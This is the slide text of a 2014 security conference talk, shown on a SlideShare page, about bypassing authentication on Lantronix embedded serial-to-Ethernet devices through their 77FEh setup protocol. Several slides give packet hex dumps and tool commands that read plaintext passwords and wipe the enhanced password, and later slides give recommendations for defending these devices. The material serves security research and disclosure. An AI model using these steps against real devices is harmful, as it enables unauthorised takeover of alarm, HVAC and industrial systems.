SlideShare une entreprise Scribd logo

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Télécharger en tant que ODP, PDF
V
Vlatko Kosturjak

Presentation presented at Confidence 2014 - Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Technologie
1  sur  37
1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
4 Mos Eisley Lab Lantronix Source: www.lantronix.com
5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
18 Mos Eisley Lab Source: Mohdafri. com
19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
34 Mos Eisley Lab Summary Source: duki@fb
35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard
37 Mos Eisley Lab Thank you! Questions and Answers @k0st

Recommandé

Ficha Tècnica Nuevo Peugeot 3008
Ficha Tècnica Nuevo Peugeot 3008Ficha Tècnica Nuevo Peugeot 3008
Ficha Tècnica Nuevo Peugeot 3008
rfarias_10
 
MR Super 5 n°1
MR Super 5 n°1MR Super 5 n°1
MR Super 5 n°1
ReZiak
 
Cruise control
Cruise controlCruise control
Cruise control
haseeb muhsin
 
Adaptive cruise control
Adaptive cruise controlAdaptive cruise control
Adaptive cruise control
sheetal kapoor
 
9 transfer de lada niva 1992
9 transfer de lada niva 19929 transfer de lada niva 1992
9 transfer de lada niva 1992
luis lisi
 
Recommender Engines
Recommender EnginesRecommender Engines
Recommender Engines
Thomas Hess
 
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Amazon Web Services
 
Motorcycle Riders Handbook
Motorcycle Riders HandbookMotorcycle Riders Handbook
Motorcycle Riders Handbook
guest2135601
 

Recommandé

Ficha Tècnica Nuevo Peugeot 3008
Ficha Tècnica Nuevo Peugeot 3008Ficha Tècnica Nuevo Peugeot 3008
Ficha Tècnica Nuevo Peugeot 3008
rfarias_10
 
MR Super 5 n°1
MR Super 5 n°1MR Super 5 n°1
MR Super 5 n°1
ReZiak
 
Cruise control
Cruise controlCruise control
Cruise control
haseeb muhsin
 
Adaptive cruise control
Adaptive cruise controlAdaptive cruise control
Adaptive cruise control
sheetal kapoor
 
9 transfer de lada niva 1992
9 transfer de lada niva 19929 transfer de lada niva 1992
9 transfer de lada niva 1992
luis lisi
 
Recommender Engines
Recommender EnginesRecommender Engines
Recommender Engines
Thomas Hess
 
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Add Real-Time Personalization and Recommendations to Your Applications (AIM39...
Amazon Web Services
 
Motorcycle Riders Handbook
Motorcycle Riders HandbookMotorcycle Riders Handbook
Motorcycle Riders Handbook
guest2135601
 
Design of Lane Keeping Assist
Design of Lane Keeping AssistDesign of Lane Keeping Assist
Design of Lane Keeping Assist
ssuserd30ca11
 
Collaborative Recommender System for Music using PyTorch
Collaborative Recommender System for Music using PyTorchCollaborative Recommender System for Music using PyTorch
Collaborative Recommender System for Music using PyTorch
Valentin Nagacevschi
 
Cat Diesel Engine C 13
Cat Diesel Engine C 13Cat Diesel Engine C 13
Cat Diesel Engine C 13
Manuel Rojas Nadal
 
Anti lock braking (ABS) Model based Design in MATLAB-Simulink
Anti lock braking (ABS) Model based Design in MATLAB-SimulinkAnti lock braking (ABS) Model based Design in MATLAB-Simulink
Anti lock braking (ABS) Model based Design in MATLAB-Simulink
Omkar Rane
 
Product Recommendations Enhanced with Reviews
Product Recommendations Enhanced with ReviewsProduct Recommendations Enhanced with Reviews
Product Recommendations Enhanced with Reviews
maranlar
 
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
Amazon Web Services
 
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
DuongDo35
 
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILESREVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
vishnusankar369
 
Adaptive cruise control
Adaptive cruise controlAdaptive cruise control
Adaptive cruise control
Muntathir Al-Turaifi
 
Nhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặtNhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặt
Thường Nguyễn
 
Manual monitus4
Manual monitus4Manual monitus4
Manual monitus4
Rubens Peres Ribeiro
 
Mr Super 5 n°3
Mr Super 5 n°3Mr Super 5 n°3
Mr Super 5 n°3
ReZiak
 
Arctic Cat 250-500 Atv 2004 Service Repair Manual
Arctic Cat 250-500 Atv 2004 Service Repair ManualArctic Cat 250-500 Atv 2004 Service Repair Manual
Arctic Cat 250-500 Atv 2004 Service Repair Manual
Auto repair manuals
 
IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middleware
Oktawian Powazka
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
Arno Huetter
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
CanSecWest
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?
ScyllaDB
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDB
Enkitec
 
crack satellite
crack satellite crack satellite
crack satellite
TecnicoAInstrumentos
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段
Koji Shinkubo
 
02-11-2005.ppt
02-11-2005.ppt02-11-2005.ppt
02-11-2005.ppt
GeraudRusselGouneChe1
 

Contenu connexe

Tendances

Product Recommendations Enhanced with Reviews
Product Recommendations Enhanced with ReviewsProduct Recommendations Enhanced with Reviews
Product Recommendations Enhanced with Reviews
maranlar
 
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
DuongDo35
 
Nhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặtNhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặt
Thường Nguyễn
 
Mr Super 5 n°3
Mr Super 5 n°3Mr Super 5 n°3
Mr Super 5 n°3
ReZiak
 

Tendances (13)

Design of Lane Keeping Assist
Design of Lane Keeping AssistDesign of Lane Keeping Assist
Design of Lane Keeping Assist
 
Collaborative Recommender System for Music using PyTorch
Collaborative Recommender System for Music using PyTorchCollaborative Recommender System for Music using PyTorch
Collaborative Recommender System for Music using PyTorch
 
Cat Diesel Engine C 13
Cat Diesel Engine C 13Cat Diesel Engine C 13
Cat Diesel Engine C 13
 
Anti lock braking (ABS) Model based Design in MATLAB-Simulink
Anti lock braking (ABS) Model based Design in MATLAB-SimulinkAnti lock braking (ABS) Model based Design in MATLAB-Simulink
Anti lock braking (ABS) Model based Design in MATLAB-Simulink
 
Product Recommendations Enhanced with Reviews
Product Recommendations Enhanced with ReviewsProduct Recommendations Enhanced with Reviews
Product Recommendations Enhanced with Reviews
 
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
Building a Recommender System Using Amazon SageMaker's Factorization Machine ...
 
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
123doc-giai-ngan-hang-cong-nghe-phan-mem-ptit.pdf
 
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILESREVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
REVIEW ON ADAPTIVE CRUISE CONTROL IN AUTOMOBILES
 
Adaptive cruise control
Adaptive cruise controlAdaptive cruise control
Adaptive cruise control
 
Nhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặtNhận diện khuôn mặt và phát hiện khuôn mặt
Nhận diện khuôn mặt và phát hiện khuôn mặt
 
Manual monitus4
Manual monitus4Manual monitus4
Manual monitus4
 
Mr Super 5 n°3
Mr Super 5 n°3Mr Super 5 n°3
Mr Super 5 n°3
 
Arctic Cat 250-500 Atv 2004 Service Repair Manual
Arctic Cat 250-500 Atv 2004 Service Repair ManualArctic Cat 250-500 Atv 2004 Service Repair Manual
Arctic Cat 250-500 Atv 2004 Service Repair Manual
 

Similaire à Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
CanSecWest
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?
ScyllaDB
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperf
Werner Fischer
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTrace
ahl0003
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
Positive Hack Days
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Yulia Tsisyk
 
Networking in depth
Networking in depthNetworking in depth
Networking in depth
Riadh Briki
 

Similaire à Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014 (20)

IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middleware
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDB
 
crack satellite
crack satellite crack satellite
crack satellite
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段
 
02-11-2005.ppt
02-11-2005.ppt02-11-2005.ppt
02-11-2005.ppt
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperf
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTrace
 
No more dumb hex!
No more dumb hex!No more dumb hex!
No more dumb hex!
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave Scope
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
 
eel6935_ch2.pdf
eel6935_ch2.pdfeel6935_ch2.pdf
eel6935_ch2.pdf
 
DEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITDEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JIT
 
Inside Winnyp
Inside WinnypInside Winnyp
Inside Winnyp
 
Networking in depth
Networking in depthNetworking in depth
Networking in depth
 

Dernier

A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Dernier (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
